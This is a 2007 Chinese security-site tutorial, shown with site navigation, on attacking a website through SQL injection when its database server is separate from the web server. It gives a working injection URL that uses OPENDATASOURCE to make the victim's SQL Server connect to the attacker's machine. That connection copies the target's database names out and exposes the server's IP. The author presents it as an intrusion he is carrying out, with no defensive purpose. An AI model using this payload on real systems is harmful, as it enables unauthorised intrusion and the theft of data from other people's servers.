通行证│用户名:
密码:
验证码:
电信
┊
网通
┊
铁通
┊
移动
在线
人
文章搜索:
热门搜索:
红客
黑鹰
红客技术
安全动画
红客培训
首页
文章
软件
动画
资源
励志
论坛
邮箱
会员
军事
科技
博客
爱心红客
最近更新
800g资源
业内新闻
漏洞公告
病毒公告
电脑知识
网络知识
菜鸟入门
攻防教程
黑客攻防
安全编程
工具使用
综合安全
个人安全
安全相关
Q Q安全
原创精华
红客人物
站内事件
您现在的位置:
爱国者安全网
>>
文章类
>>
红客教程
>>
攻防教程
>> 文章正文
注射过程中DB_ONER权限并且主机与数据库不在一起的搞法
责任编辑:水土不服 更新日期:2007-1-4
其实.即使
数据
库和WEB不在一块还是有机会搞的.并不是说一点机会没.一般
服务
器装好系统什么的.都会装个IIS吧?列他C盘.看看有没有Inetpub这个目录.就知道他有没有装IIS了.但是.不知道他IP也?怎么办呢?可以这样来,PING一下WEB
服务
器.扫他这一C段的1433端口.看看哪台开了.不过这方法也不好.现在很多主机都启用了防火墙.1433端口就算开了你也扫不着.这该怎么办呢?可以利用opendatasource宏让对方的SQL与自己的
数据
库建立连接.既然能建立连接.就可以得到
数据
库
服务
器的IP地址了.我们来试试看.有几个前提得说一下.第一.你机器必须要有公网IP.而且开放的1433端口要保证能被外网访问到.好.条件满足.就开始做吧!
我现在搞的这站.100%
数据
和WEB不在一块.但是从C盘看到了Inetpub文件夹.说明这
数据
库
服务
器安装了IIS.但是得不到他IP呀.怎么搞哦.简单.就用上面所说的方法搞一下.先在本机建个库先.打开查询分析器输入
create database hack520 create TABLE zhu(name nvarchar(256) null);create TABLE J8(id int NULL,name nvarchar(256) null); 点执行.
建立了一个hack520的库名.和zhu J8两个表.zhu里面有name这一个字段.J8也放了两字段名.一个是id一个是name.好了.现在就可以开始建立连接了~~~~~~~先看一下这条SQL语句insert into opendatasource('sqloledb','server=你的IP;uid=SQL用户;pwd=SQL密码;database=建立的库名') .库名.表名 '执行的语句' 恩现在开始吧...
http://www.xxx.com/news.asp?id=126'insert%20into%20opendatasource('sqloledb','server=219.149.xx.182;uid=sa;pwd=hack520!@#77169;database=hack520').hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases--
在IE上执行咯.呵呵这个时候对方就会连接到我机器的SQL
服务
器.不信?netstat -an看一下
在CMD下输入命令:
netstat -an | find "1433"
上一篇文章:
推荐:入侵渗透思路
下一篇文章:
入侵Windows2000系统放置后门的方法
最近更新
爱国者安全网2007年度优秀版主评选
瑞星公司01月11日发布 每日计算机病毒及木马播报
破解博彩神助(专注彩票) V2.8.01
推荐:跨站脚本执行漏洞代码的六点思路
Windows系统下的远程堆栈溢出 实战篇
Windows系统下的远程堆栈溢出 原理篇
MsSQLServer是如何加密口令的
浅谈国内的渗透评估过程
Dvbbs8.1 0DAY(通杀Access和mssql版本)
微软:我们的代码比赛门铁克更安全
热门文章
提醒:“求职信”病毒1月6日发作
两条“蠕虫”蠢蠢欲动
5“网银大盗”狂盗储户14万 武汉男子被判10年
“木马事件”终告结束 英语学习网重获新生
搜索引擎不再喜欢新米,并非只是CN米
蠕虫"威金"新变种 "小熊猫"屠宰多个计算机系统
元旦上网谨防“Real蛀虫” 通过视频文件传播
入侵工具Knark的分析及防范
认清本质 计算机病毒防治常遇问题
饶过现代Anti-Rookit工具的内核模块扫描(ZT)
精彩专题